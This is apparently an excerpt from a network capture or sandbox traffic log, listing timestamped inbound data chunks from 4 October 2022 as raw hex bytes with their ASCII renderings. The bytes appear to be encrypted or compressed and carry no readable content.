                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9415INData Raw: a7 35 78 7d db cc 4b ee 92 ce 00 cd d1 f1 97 88 34 38 45 39 fa 5d 04 53 16 6d 5d 34 78 9c 43 2c da 07 17 99 e9 24 a2 b1 f3 a2 0e 7b dd d6 bb 30 8a 4f 2b d3 7d 46 d7 de 4c 3f dd b1 67 2c 92 72 78 54 88 7e e7 05 7c c1 5b ec 80 78 49 fc 7f 1c 8d ed d8 08 91 34 d0 b0 4c 4e 59 c3 91 df fe 81 80 b4 ea 0e 79 31 bb 0f 9f 81 90 d4 c3 cc 06 2d 4e 26 34 a7 28 3a 7b f3 8d d8 62 db 84 55 4d 09 4d c6 49 47 17 e9 26 47 c2 34 ba e7 c8 83 21 90 18 b9 5a a2 b9 e2 e7 55 53 94 cf 5e 3e 46 fd 22 af 9b 8f 50 52 9f 15 a3 bc 59 fc 69 16 74 b5 9d 5a fc cc dd ea b8 57 35 0f 83 e1 ad 04 9d 14 27 5d af e0 91 cb 46 87 8c 67 6e 4b e7 33 4c d0 0b d7 66 e6 c3 34 b7 ae 1c 24 e6 37 42 63 7e 78 d6 8b bf 1f b7 ad 71 1b 92 c4 6e 96 9f e5 53 3d e3 b4 68 bf b4 51 a5 bf a9 e1 4c b8 b6 b5 31 b2
                                                                                                                                                                                                                                    Data Ascii: 5x}K48E9]Sm]4xC,${0O+}FL?g,rxT~|[xI4LNYy1-N&4(:{bUMMIG&G4!ZUS^>F"PRYitZW5']FgnK3Lf4$7Bc~xqnS=hQL1
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9431INData Raw: f2 b5 14 d1 61 53 c2 5b 88 21 4b e8 23 11 ab 2f 97 b0 03 a5 57 ea ce 2e d2 6c 28 5c 90 4a 78 22 9b b7 4c d2 14 25 18 87 d1 92 70 5c b2 10 bf 3b 62 24 0b 33 cc 2d 23 4a 15 dc 79 4f 86 02 94 31 e2 3a 09 c4 a0 84 8e 8d a1 48 0d bf ce 7f f7 a6 a2 ca d1 e1 78 d5 a7 da 69 06 3f 7d 12 08 72 5f 92 de f3 7c b5 cf bf 0b 2f fa a9 b3 46 e2 82 79 1f 8d e1 c1 e7 de 2a 0b 54 9f 2a 4f 2a d5 e6 cb ef 9a eb 6b 5b 3d ca 31 44 4b 01 56 4c bb dc a7 7f e8 90 7c 6e b4 21 ab a0 14 4a db b3 06 98 97 1d 37 fd 45 28 0f 6f 06 c1 90 da 58 05 a1 91 08 07 c4 4d bd 8e 3b 5b 2d 8b 89 1e a0 37 0f ea 00 a2 d2 24 82 7f 85 de 3e 33 47 30 f0 18 6c 22 3e b2 76 a5 51 78 f0 1d e2 ba 7d a3 e2 1b 85 c7 1c d4 3f d8 93 47 df b1 54 0e ef c3 24 eb 5c 6e 62 9f 79 c9 6e bf 39 f3 9f f7 9f e2 e1 85 17 34
                                                                                                                                                                                                                                    Data Ascii: aS[!K#/W.l(\Jx"L%p\;b$3-#JyO1:Hxi?}r_|/Fy*T*O*k[=1DKVL|n!J7E(oXM;[-7$>3G0l">vQx}?GT$\nbyn94
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9447INData Raw: 94 f9 b3 6b 63 58 82 5f f1 9f 25 7d c9 75 c0 9f 79 6e 19 76 ed fc 81 0a bb f9 61 07 7c 4a 37 1e cb 30 e3 27 c9 4e 13 1d ca c4 81 a1 b8 97 c3 b9 85 2b d6 79 0b 19 ce ff fd 66 73 39 bc 90 05 02 22 d2 7f d7 45 40 55 88 db 27 7b 10 e1 17 2f aa 97 9b aa f0 ea de 53 54 27 10 6b 97 d6 e4 c6 af f7 d6 b1 e9 69 3a 5b cf 7b 25 d5 ad 08 16 54 88 5c be 54 b9 90 08 30 a0 96 cb 58 09 fe 19 44 41 cc 1d d8 7e 13 ee fc 80 2b 6c 24 ce 65 2c 0a a1 06 bd d2 7b 3c ee a3 9b 2d 49 4c 16 b3 f8 0e e6 c0 ea c0 c5 67 53 e3 82 28 22 40 26 e9 6e 43 2e fd a2 7a 34 0a b3 a2 7d 6a 30 81 91 1c 26 10 90 04 14 98 5d c5 ef 4a 8d ca 94 a4 fc 87 83 3c 08 7c 32 2e 60 ee 0b f6 e2 7e dd 46 29 9f 9e b7 dd 05 0a 2f 45 35 98 f4 85 22 7b 86 10 f5 0c ea 3d a3 02 85 5b a7 82 55 46 3f c9 38 24 dd 9b 42
                                                                                                                                                                                                                                    Data Ascii: kcX_%}uynva|J70'N+yfs9"E@U'{/ST'ki:[{%T\T0XDA~+l$e,{<-ILgS("@&nC.z4}j0&]J<|2.`~F)/E5"{=[UF?8$B
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9463INData Raw: 42 7f 91 51 b7 58 2d cf db 36 d5 1f c4 c0 e0 0a d4 bc 84 ac bf 33 63 8d ce 8a 9d d1 88 0c b5 c7 d3 15 3f 1c fc bd b7 b6 03 9c b6 39 18 b1 1a b2 2e 01 0e 38 b7 b9 e9 25 23 48 be e6 17 89 ab 0a 33 ac f3 65 1b 7a 36 21 2d d2 c1 58 31 a1 1c 6c bd 68 49 48 5b e7 28 62 3e 41 a1 af cd ad 18 dc 2b 65 dc 4c a1 f7 fa c2 aa 55 20 45 fd b0 f1 47 61 cc 96 bc d5 69 41 cd fd 4a bc dd 93 36 a0 22 1f 9f 1d 4d 4f eb d9 90 55 38 53 fd f4 49 5f 28 ff 8e 5b 8e 2e 20 b2 31 aa 9e 8c 45 81 04 58 9f c5 12 7b f3 76 d8 a0 e4 83 93 79 3b 5e 2f f9 e4 67 17 ea 3a fc fc b9 fb c7 f2 b9 cf 74 60 83 61 2d a4 65 b7 bb 27 66 c1 c4 c4 1d 8c c7 74 c5 59 57 16 1c 0f 31 a6 3a f5 56 f3 5c 87 78 12 10 13 f7 08 70 68 fc a0 dd fe f8 5c 57 66 c9 26 6c e9 0a fb 55 07 d4 42 9f 05 83 c8 d9 7e 4a 3f ac
                                                                                                                                                                                                                                    Data Ascii: BQX-63c?9.8%#H3ez6!-X1lhIH[(b>A+eLU EGaiAJ6"MOU8SI_([. 1EX{vy;^/g:t`a-e'ftYW1:V\xph\Wf&lUB~J?
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9479INData Raw: 4c 49 07 b0 17 96 c0 53 c3 43 66 7d 05 77 22 a6 e5 bc 07 0e f1 00 ba 70 9b 8e c8 fa 40 3e 05 1c 48 84 7a 57 f5 53 e4 24 d3 81 de 68 13 53 6d 74 cf db 26 8e 3d 28 1c 3a 7e 9c 89 4b b4 8f 67 1c 9e 01 74 8b 8e 11 31 d7 95 98 62 02 7f 3a fd d7 85 6f 96 a6 55 a0 78 ad bd 8d 94 6a 7c 72 ad 63 c0 cc be cc d4 45 6e 0b a9 69 4c c5 9c 47 e2 df 1f 14 e6 93 30 9e a4 f0 9f de 29 39 8c b7 2e d2 08 00 26 e2 be b4 d6 db 9f 99 aa 35 64 82 a4 ce 9f 8c 51 45 07 a7 6c 06 3f 55 48 aa f0 28 32 10 23 84 67 41 cf b5 fd e9 88 e8 23 6d f8 8a 64 b2 3c 3d 79 44 28 dc 28 65 2e 36 56 27 9e a1 78 16 e2 74 1a ef c1 cd c1 ab cb 7d 8c 9e c7 29 3e 3f ec 58 86 27 10 f2 de 66 3f 32 c3 fe 36 8e 6c ef a4 09 3b 37 9d 5a 7b 8d 58 fd 7d fc 96 3d 6c 93 40 3b b3 25 10 a4 65 46 5f 31 62 f6 c8 1f 84
                                                                                                                                                                                                                                    Data Ascii: LISCf}w"p@>HzWS$hSmt&=(:~Kgt1b:oUxj|rcEniLG0)9.&5dQEl?UH(2#gA#md<=yD((e.6V'xt})>?X'f?26l;7Z{X}=l@;%eF_1b
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9495INData Raw: d8 28 59 0b 5a a7 b8 44 68 f7 1c 9d ac 1a b3 1f 2f 26 ac 1d bb 31 47 08 85 09 03 28 8b 9f cd bd cf 43 c6 70 06 8a d7 db c4 83 64 a4 d4 d5 a9 13 99 1d 88 7d d1 2d 8f 76 5f 27 6f 9c d6 54 7f 22 e4 a2 e0 a8 27 36 2f 16 c5 8d a0 9c 6c 95 0f 2e 95 f6 35 b0 77 63 69 47 af 55 64 2d 4e 46 af 2f aa b5 17 00 83 fa c9 ed 6f 80 d6 7c 40 3c c2 f5 2d aa c1 72 57 eb b4 99 5a 2d ac 1a b2 cd 12 78 28 7f 7b 91 d1 16 db 32 0f 12 16 5e 31 40 d6 17 a9 a6 08 56 da 44 49 29 a3 99 97 9f 6d a4 15 0e b8 5d ab db f7 b7 ff f8 96 eb 40 ef 85 e9 75 15 fb f1 df ce c1 ca c4 a6 af 9b 84 2e fa 77 93 49 97 e5 e1 12 f6 5a f9 4b 4e f8 0a 7c e5 8f 0b 11 b2 b6 8b 0e a8 60 ed ad 8c 68 d5 90 49 63 3b 87 da cd 25 cc 47 48 c6 02 bc f2 0d 43 af f3 93 aa 2f 19 97 dc 2c 1e 58 f9 5c 07 64 a2 0c 68 f2
                                                                                                                                                                                                                                    Data Ascii: (YZDh/&1G(Cpd}-v_'oT"'6/l.5wciGUd-NF/o|@<-rWZ-x({2^1@VDI)m]@u.wIZKN|`hIc;%GHC/,X\dh
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9511INData Raw: 55 64 02 04 fb 6d 2e d0 d3 48 cb 45 d3 de f7 93 9d bf db 12 38 78 68 53 99 2d c2 81 88 f9 ab cf eb a8 53 c9 f3 22 8a 8b fa 32 46 1e 53 ed 76 48 4d 5e e3 04 85 e1 1a f2 f8 4e 9a 8b 10 26 e9 fc 65 1f 96 ad 87 54 e0 03 0e 34 af 04 17 fb 51 6a 7b 1d 04 b8 f2 6e 17 f6 ef 79 94 ef 77 53 1c a6 95 91 01 bf d3 ef cd 21 53 e9 0f 1c e7 30 1e a7 2c d5 91 08 62 56 0e 54 d6 e1 77 04 fd 21 cc 55 cb 47 f7 6b 7e f1 4f b5 6a 9a 9f 35 1c 6e 52 33 a0 b3 ab c9 a8 59 51 9a d7 18 05 16 70 12 d6 26 ff 6a f6 f0 9c ab 15 11 28 6e fd 6c 5d 54 b2 d4 51 9f 2a fe 89 50 69 fe 3b 7a bc 8a d9 2b 52 03 f5 8c 29 a4 2a 9f 6d ee b4 e7 29 f4 dd 13 87 0e 0f 94 68 96 4e 38 ad ae 47 8a 3f 1c ae 40 90 28 24 27 c1 af c4 e2 d9 9a 13 95 ca 2c d4 d9 e4 5c b3 e1 59 18 be e9 71 b2 a1 50 d8 25 64 9b c1
                                                                                                                                                                                                                                    Data Ascii: Udm.HE8xhS-S"2FSvHM^N&eT4Qj{nywS!S0,bVTw!UGk~Oj5nR3YQp&j(nl]TQ*Pi;z+R)*m)hN8G?@($',\YqP%d
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9527INData Raw: 28 e7 00 d0 02 dd 22 b8 b4 c8 25 7a 0e 8f 68 b2 bc 24 2b 1f d8 f5 b8 14 aa 59 fd a7 65 0f 48 90 8d dd 2c 81 54 3b a9 fc 2c c3 a6 b1 88 a1 5f 37 98 db c2 36 22 d4 20 b5 47 b4 b1 89 00 6a 0b 8b 59 38 c2 9c 1c 8e 6d c6 46 c2 1d 26 05 8a b1 79 c0 65 98 41 f9 44 22 3a 15 bc d5 d9 40 cd 2b ad ee a2 8c 87 f3 6a 7f e4 a2 0e 41 52 c1 e2 c6 30 0e 17 09 69 41 a1 88 d7 67 88 22 15 0e d5 7e 22 18 9e 11 ee 3d aa c3 fb a3 52 e2 3d f6 f7 fd 69 2c 86 99 db 14 21 a7 30 0e bd a6 ed 08 ad 37 ca 05 f1 e2 4a ee 90 56 97 a4 8a 1e 37 ee a2 b1 80 9d b2 ee fd 15 0f 0c e6 62 e2 e4 db 68 c3 37 3c c9 f7 27 d3 15 d1 ec 05 9c 46 a6 a0 1b 82 72 92 9b e9 c3 bd 80 28 47 aa 19 54 0d ac f0 ba b9 87 e7 2d 3d 82 41 1a ae d3 d7 8c f3 e9 8c c6 38 0f 20 66 09 39 8c 5a 7a d6 e3 7b 11 02 7a 70 c5
                                                                                                                                                                                                                                    Data Ascii: ("%zh$+YeH,T;,_76" GjY8mF&yeAD":@+jAR0iAg"~"=R=i,!07JV7bh7<'Fr(GT-=A8 f9Zz{zp
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9543INData Raw: 0f f5 04 54 10 45 23 cb 10 b5 e0 2e e5 38 7b d7 77 88 da 48 44 81 a1 08 98 8e 21 1f f2 b4 89 49 cd 82 7f 25 aa 72 10 ba c5 79 ad a2 de 84 ee 9e e4 79 c6 10 c4 7e 62 d0 fc 8c 8d ff 96 b6 81 30 1d 45 2c 64 3e e0 01 e4 d5 2e c6 34 6e af 90 1d 49 66 fe 9d d1 53 7b 9c 40 7a 27 1d 8d 50 37 9e 46 91 22 29 d7 ea c5 30 aa 48 25 0b 02 6e 40 79 9a ae 90 55 e9 2b cc 08 28 3d 67 0e 0a 36 45 d5 78 39 ee b2 4e 41 7f c2 94 98 c6 c5 a0 01 28 71 37 8e 19 44 39 dd 12 4b f0 e6 30 77 ad cc e1 8a 20 a6 56 78 55 e3 11 09 2d a6 3b 10 79 90 3f 9a 8a c3 00 d7 cf 62 ea e4 39 25 47 7d fa 3e 5d 7a 3b 68 10 ab 45 11 18 e9 f5 9c a7 f3 e5 4a 26 ba a2 ae 46 ce 78 90 e0 10 17 36 59 db 60 27 3b ca 97 bf d6 21 30 c4 27 cf f9 15 a4 4a 3b 11 41 a8 91 4b 3e 76 23 ec d1 d9 4d af 7c 41 3b ec 0f
                                                                                                                                                                                                                                    Data Ascii: TE#.8{wHD!I%ryy~b0E,d>.4nIfS{@z'P7F")0H%n@yU+(=g6Ex9NA(q7D9K0w VxU-;y?b9%G}>]z;hEJ&Fx6Y`';!0'J;AK>v#M|A;
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9559INData Raw: 66 e4 ea a4 14 7e 76 7d 5f 05 b2 38 76 65 b1 ad 67 fd a1 a9 52 8e 37 7f 12 94 19 a1 b3 97 b2 6e 18 c5 97 86 f4 3a 45 a9 82 d9 63 6b f6 29 6a 3a 0b e0 1e 5c fa 54 f1 89 b8 fc 69 ee 9b e3 22 6e 19 f8 c7 d6 c5 2a fb f8 35 2a c3 72 98 7a a0 c0 9d dc e4 13 19 f6 a4 2c 33 29 82 ab 16 3f 9a 8d e9 ea 80 7d ab f6 7c cb 9b 76 da 5e b0 cb b8 4c 70 73 5c 53 35 7a 35 1a 74 db 55 23 a4 17 d1 97 e0 2d fc 33 6e 04 96 06 be f6 2c 36 8d 5c 8c f1 b6 95 98 c1 89 9b 25 92 0b 9b 23 a4 cd 96 12 46 f8 82 ce ae 98 8b 05 b2 e2 ab f4 9d 98 a7 44 09 fb 66 fe de 94 8e 4f 37 f8 0e 77 f9 f5 02 8a f4 11 c3 db aa 6a 88 ad 14 90 11 4b 42 26 43 3e e0 69 f8 0f f3 68 35 17 62 4c d3 5d 96 d4 9e 15 6a 5c 30 cf a5 6b f0 53 87 9d 43 f4 26 54 1b c5 d0 62 02 fe 80 e2 88 bc af 50 05 0e b9 0c 3f 6f
                                                                                                                                                                                                                                    Data Ascii: f~v}_8vegR7n:Eck)j:\Ti"n*5*rz,3)?}|v^Lps\S5z5tU#-3n,6\%#FDfO7wjKB&C>ih5bL]j\0kSC&TbP?o
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9575INData Raw: 93 42 28 9f e7 54 c2 6c 22 1b bb c4 7c a9 e6 6a fe 43 78 a3 84 22 7a fd b6 85 93 1b f5 4b 9a e4 da 09 2e 4b 63 22 46 83 83 26 44 51 b4 c3 c2 63 94 d0 cd 7c 96 ba 5b c5 84 17 cb 6b 9c 85 3c cf 2c f7 0d 5a b0 71 2b 13 84 53 33 9a f0 67 e0 93 29 d4 ea d3 97 0c d5 61 a1 bc 31 7a 05 6c eb 7c 49 15 29 bf f2 88 8b 5a 70 3c 4a cb 7f 5f 42 fb 70 80 f4 78 b9 b7 6f 20 cf 75 bd 8d 8c 0e ee 2a d9 7a 5b a2 0c 7c e5 4b 48 7b d8 be 5d e9 43 21 9e ca c7 f5 96 7c bc 08 11 50 d6 67 fd c3 74 3a 58 9a 27 92 d6 22 b0 f8 03 b3 29 7e 9b 4b 44 b7 26 1f 05 14 39 54 d7 1d c9 a4 d4 2a 0d ea 97 16 74 9d a3 f9 d4 5a bb 4c d0 f1 9b 02 87 7e 04 3d 1f 91 73 43 a4 b4 c6 b7 fa 29 c6 be 2d b4 2f 7a 22 8b dc ea 66 28 18 84 2e b7 7d 22 63 df 7c 39 6e 01 be 5a 3b cf 51 7f 78 30 84 cc 6d 81 b1
                                                                                                                                                                                                                                    Data Ascii: B(Tl"|jCx"zK.Kc"F&DQc|[k<,Zq+S3g)a1zl|I)Zp<J_Bpxo u*z[|KH{]C!|Pgt:X'")~KD&9T*tZL~=sC)-/z"f(.}"c|9nZ;Qx0m
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9591INData Raw: e5 d6 71 de c7 88 7f 56 dc c6 9b c4 df a2 1f 83 31 3a ed b7 b0 06 ca 12 f2 d6 bf 5f b9 28 f0 4e d3 59 fb a9 f6 45 e0 9e 79 0b d3 39 e1 a5 88 fc b9 45 6b 72 26 0d af ee 8f f6 57 94 1d 7f ed 49 75 b3 d0 a2 da 73 e5 68 94 a4 c5 b9 7a 45 a1 f6 53 40 1b 4c 94 91 07 be 20 b7 a1 01 38 7d c5 0c d9 44 79 2c 6c a0 92 ea 4d af 34 9d 09 55 c8 6f 42 ff 78 dc 14 53 f6 75 07 78 4a 0b 6a 5b aa a0 6c 1f a2 36 51 94 01 8c aa a6 cc f4 7c 35 c2 2e ed 48 7d 64 e1 3a 9b 24 57 b7 a5 97 90 af f4 87 39 07 26 23 74 a7 a3 0c 8a 6d cb 85 9c 31 a7 28 3c 48 4f a3 8b 78 51 9f 3e e2 3c 8d 94 f9 3f b1 0d 4f c4 ba 40 d2 59 84 43 74 c1 86 5b fe d1 cd 68 23 27 ec 97 73 b9 e8 45 85 d1 6c 3b cc 6c 72 29 ed 3a e8 f8 10 75 53 52 c0 a6 77 33 d9 95 50 81 dd 0d aa e6 2c b8 8e 99 5c d7 92 62 85 0e
                                                                                                                                                                                                                                    Data Ascii: qV1:_(NYEy9Ekr&WIushzES@L 8}Dy,lM4UoBxSuxJj[l6Q|5.H}d:$W9&#tm1(<HOxQ><?O@YCt[h#'sEl;lr):uSRw3P,\b
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC9607INData Raw: 85 ff 07 80 02 8f b4 8f 1f 5f 9a 05 78 b5 60 2e 01 3c fb 77 33 f4 6a 07 40 fc 66 e1 65 55 31 b8 e0 1c 80 a7 87 d7 22 eb e0 94 38 d4 57 f7 bd 92 c5 e6 b5 6e 1d 87 da bf bb c4 a2 84 52 10 5f dd f4 61 5f 39 05 42 ff 47 23 80 49 85 90 11 17 53 27 da 67 1b 0d f1 8d 6b 69 bb 57 3e 12 c4 08 71 c1 f3 74 92 36 d9 67 5b eb 2e 6b 7d 4f ba cd a4 89 e2 c9 02 f9 97 22 46 63 14 6d cc 1a 0b 94 f7 24 66 14 8c ff 4f ec 8c f6 00 ab 8e 3a b5 ce a7 20 45 49 b2 24 b3 24 50 00 04 31 90 36 f6 19 7e 93 d9 ee 7b 66 e0 3c 28 d6 b2 02 ae dd e4 ea e5 ea f4 94 69 73 da ad 4d c3 03 b1 32 b3 72 74 67 07 27 52 28 b6 b2 4f 22 55 2a c3 cb f0 9c 9c d6 89 36 25 2c c8 44 af 00 c3 05 6f b5 dc 0c 41 a7 a0 0f 5a 50 1a ed 2a ca 0b 8e 1f 98 1c 50 dc d7 1d e3 5d 73 94 f4 14 d5 9b 3b a9 83 8b 58 76
                                                                                                                                                                                                                                    Data Ascii: _x`.<w3j@feU1"8WnR_a_9BG#IS'gkiW>qt6g[.k}O"Fcm$fO: EI$$P16~{f<(isM2rtg'R(O"U*6%,DoAZP*P]s;Xv
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9623INData Raw: 2f e4 6d da f5 2f ca f8 ec 29 94 f8 96 72 d9 3a 3b 3f 5e 58 8d a3 07 b2 b6 5f 6b 8e ae 6f 11 93 ff c1 87 9b 36 0d 1f 73 6d 07 f3 7a 72 77 31 02 63 2c 19 28 3b 65 19 5f 6b 55 8b 18 6e 26 fa 7d c1 26 e3 03 67 18 30 44 d9 23 6e f5 b3 8f b9 f2 1c e5 6a b3 df b4 81 b4 50 6a 9a 1b 90 75 85 16 ce df dd 57 12 1b c0 3e ef c4 03 3a 68 17 c8 00 19 55 f7 d5 13 57 2c a3 ee d0 9d 5d 6f 64 ca e1 4a d9 38 f0 42 f7 c0 85 10 13 04 ac 5e 0b cc f4 49 61 a9 7e e0 68 d5 44 70 1e e9 34 dc 01 c1 43 e9 6c 94 65 82 e2 11 90 51 7b 1d 40 9d 8e 9d 77 52 59 5d df e1 26 6b b5 cb 80 8c e6 a7 bf 13 2c fb 98 ce cc d3 8f 1c 91 68 9a 97 02 75 82 5b 2d 48 9a 74 7f 95 e6 ec 45 74 a0 40 ae b5 b5 85 5e 56 de 04 5e c8 fe 6f c2 70 ab c4 83 c2 3d 57 df 18 b0 ab 49 de b2 70 78 1c c3 da 11 50 a6 f7
                                                                                                                                                                                                                                    Data Ascii: /m/)r:;?^X_ko6smzrw1c,(;e_kUn&}&g0D#njPjuW>:hUW,]odJ8B^Ia~hDp4CleQ{@wRY]&k,hu[-HtEt@^V^op=WIpxP
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9639INData Raw: 95 de df e8 58 dd 25 d5 cd 40 e7 c0 76 1d 9a 28 47 0a 5d 1a ed fe ea 06 3f b6 13 ed 71 8c e3 df 23 15 ef 29 4c 93 66 d6 86 b3 55 7a ca 43 11 f8 76 1d 8f 26 1c ca da 21 f2 9b 03 28 71 3e 37 f0 19 90 af 67 fe 50 4c bb ab bd 72 0d f8 7b b8 1c c6 fa 4d c4 13 b1 c7 f5 26 d9 0c 1b 49 6b 89 95 e9 3b ac ab 28 f5 5f a7 c4 55 5e 7f c9 63 4b 9a 5a 52 48 8c 15 6b eb 28 03 21 eb b2 bb cb e9 75 ff 10 14 5c 33 82 fc 46 87 0f f1 42 dd b5 39 31 ae 04 19 40 f0 36 2d 25 a7 a4 d8 51 7b 81 4d 9e d0 00 0a 76 03 e7 f8 b8 fc 28 d7 ca 2b 26 bb 24 07 2c e0 63 6c f5 84 f4 ee ff b2 9c ed 51 84 53 22 f4 7a 51 8c 12 18 50 5c c2 23 7b 45 52 ee d0 b2 e1 b4 02 df 4d 8a 6b df 6a 82 26 e0 9a 52 5f 99 46 49 3e 08 1a 0f 36 1b d4 f5 8e 44 7f 6e 60 15 4a c5 0c 63 83 b3 8d 82 ed 2e da 30 cc de
                                                                                                                                                                                                                                    Data Ascii: X%@v(G]?q#)LfUzCv&!(q>7gPLr{M&Ik;(_U^cKZRHk(!u\3FB91@6-%Q{Mv(+&$,clQS"zQP\#{ERMkj&R_FI>6Dn`Jc.0
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9655INData Raw: b6 03 c3 4a 4c 62 e7 42 28 47 8b a6 64 4c 64 76 56 a6 9e 8d 15 3e 3c 6e b0 c7 e0 8b e8 20 8d 0b 49 6b d8 b0 99 28 bb b7 71 bf fe d3 81 b6 b4 4f 49 7c 3a 0b 48 9d 07 ae e0 1a ee de 17 25 26 48 20 6c 11 a9 e6 d0 f0 22 57 24 08 d0 bd d6 98 11 59 26 3b f1 f1 d8 59 69 8d fb cb 0b 84 24 7a 85 fd d0 d7 56 42 41 7e 35 22 23 a7 5d e6 e8 bc a6 7f b2 71 0f dc b8 2c 5e 27 0b 99 89 9a 8a 26 d6 41 f4 de 5c b0 ee 63 3d 07 7f 99 2d 88 41 3c 05 e1 fd 31 ad f2 f8 ad 5e 59 75 18 2d 69 f5 98 b9 d5 d8 36 4d 43 3c be ef a2 c5 9d 50 40 15 36 42 2a 63 bf 2b 5f e6 dd 28 eb cc b4 1d 47 91 40 81 47 57 85 0f 72 41 42 7d da 1a 54 6e 6c 84 c1 95 2e 8d 8a b8 fa 49 9b 8a 6c e4 98 88 93 09 50 90 f8 63 4a bf df 10 11 e7 0e 72 dc 8e 5e ba 1b 22 9a 7a 28 3e 96 dc 25 0a 9a aa 8e 3e 66 1b 12
                                                                                                                                                                                                                                    Data Ascii: JLbB(GdLdvV><n Ik(qOI|:H%&H l"W$Y&;Yi$zVBA~5"#]q,^'&A\c=-A<1^Yu-i6MC<P@6B*c+_(G@GWrAB}Tnl.IlPcJr^"z(>%>f
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9671INData Raw: 58 36 ce 7a ca 1a fe d8 22 74 6f bd 4b f6 a4 d9 02 3c a0 44 e1 c6 dd cc 3f f9 f5 41 2a ef 95 63 2b 79 e4 1d e3 ac ad d5 1a 54 78 82 88 6c 5a 4c 73 de 8f e0 8e 2d 18 99 3a aa d3 81 ab d6 41 53 c0 9d 49 64 8d 2a 86 1e 23 7a 88 a7 1d ae 1d 56 38 e8 78 ed 75 a6 0d ab bf 7d 8f ae b0 ef e1 36 0d 95 c7 7f f3 a0 55 59 86 39 f0 d0 d8 b4 49 e9 63 06 bd 79 bb 09 65 dd fa bd 18 f0 a6 d1 ac 33 64 cb bc d2 0d 3e 41 7e 88 17 f9 74 75 cc 66 71 eb 60 43 d8 d4 6c b8 26 d0 ee 38 e7 14 ec 29 ce 3d 91 a8 84 46 c8 0f 4b 58 64 de 69 99 39 4b 2b 1b 2b d6 bc de c3 2d 0f 5e 4a d8 56 dc a6 1d 6c e6 fe ed fe 98 68 fc 3c 7c 1c a0 65 69 08 60 f2 6d c4 45 2d ec 65 13 d5 cf 81 01 d0 2a b0 e4 71 35 2f 94 59 64 c9 3e ca 16 01 df 69 bc 09 89 3d f3 fe 17 af 5c 8a e2 a5 eb c8 97 8a f2 34 08
                                                                                                                                                                                                                                    Data Ascii: X6z"toK<D?A*c+yTxlZLs-:ASId*#zV8xu}6UY9Icye3d>A~tufq`Cl&8)=FKXdi9K++-^JVlh<|ei`mE-e*q5/Yd>i=\4
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9687INData Raw: 90 f7 eb cf 67 4a 5e 2f c7 24 fd 46 26 07 b2 e9 b4 6e a6 e5 0b e4 82 5e 39 6b 14 48 9a 08 d8 0d 7c e8 35 2d 69 a4 45 f2 3c 14 6d 47 5a 20 e7 38 28 80 8d e9 ca e3 29 71 7f 12 80 55 08 c2 23 ba ae a8 5b 30 96 6f ec 2b c7 d4 94 73 4e 47 80 9b 47 17 56 40 4b 46 d1 e8 e7 44 81 b3 5b 4b 78 16 49 c0 4b 83 d8 1d a8 e9 96 1b a5 ef 94 72 5c 93 a8 a4 cc 2e e6 79 7a 0f b6 c3 a1 06 08 78 b8 34 63 f7 cc cd a7 82 66 ec 58 d6 d9 64 da 00 df 3d ed 29 86 a8 88 57 87 06 ee 33 97 cb b3 a7 35 96 1b b1 2f 92 f3 70 c3 af 4d 84 fb fb 93 47 3b 4a 50 a7 3a d2 8a 76 13 44 f0 ff 34 14 4d b2 d3 a9 65 76 5d a7 49 49 f5 a6 e0 77 b7 21 34 30 17 5c 2a 74 dd 22 77 d6 e2 dc fd e2 ab c9 6c 32 46 83 96 6f d6 8b a5 7f ed 53 58 15 99 bc 4b 1a 0a d5 64 34 d5 b1 9d 34 ee 3c 56 20 b7 df ed 87 ee
                                                                                                                                                                                                                                    Data Ascii: gJ^/$F&n^9kH|5-iE<mGZ 8()qU#[0o+sNGGV@KFD[KxIKr\.yzx4cfXd=)W35/pMG;JP:vD4Mev]IIw!40\*t"wl2FoSXKd44<V
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9703INData Raw: c9 22 49 ab 5b c9 78 ca e7 87 2f 4b f5 e6 0c 0b 05 1d ac 31 2a a2 4d 58 fe b9 57 69 a4 8f 03 3b 72 11 67 2b a1 7a 53 ac bd ff 69 98 eb 67 de 93 de e6 c0 c5 07 00 09 d7 53 3d 6b 48 39 eb 04 c8 d9 14 a2 cb e7 91 78 47 0c 83 fc c5 bb ac 8c a0 dc bf 5d 48 a8 e2 eb 2c ed 53 cc 92 e0 42 fb 66 d0 c5 3f 9a 80 5f e1 8d 9b f1 3a 8d f5 bb 04 ac e6 ce 2b 51 20 a2 e1 f3 e8 75 b1 e7 55 f4 25 f8 30 78 d4 8e 62 00 6c 3a 35 15 5f b4 5c 7f e2 7c e5 fd f9 44 e2 04 3c 4e c8 c8 a1 d6 c3 44 f4 94 5f 88 4b 99 27 fd ca 77 72 63 33 e0 0d 0c 95 f6 f9 a3 e1 af 72 55 49 aa 57 58 c1 6e 41 00 5f 62 2d a8 9a 6e 88 89 45 b5 c0 ce 24 2d a4 00 56 96 34 46 c2 9f 8d 89 78 0b 11 da 06 a1 6e 49 9d 52 f9 99 e7 96 a6 ed 09 47 60 0c 98 77 08 63 6d a3 77 4c 41 fa eb 55 74 87 20 16 96 af 93 fa 7d
                                                                                                                                                                                                                                    Data Ascii: "I[x/K1*MXWi;rg+zSigS=kH9xG]H,SBf?_:+Q uU%0xbl:5_\|D<ND_K'wrc3rUIWXnA_b-nE$-V4FxnIRG`wcmwLAUt }
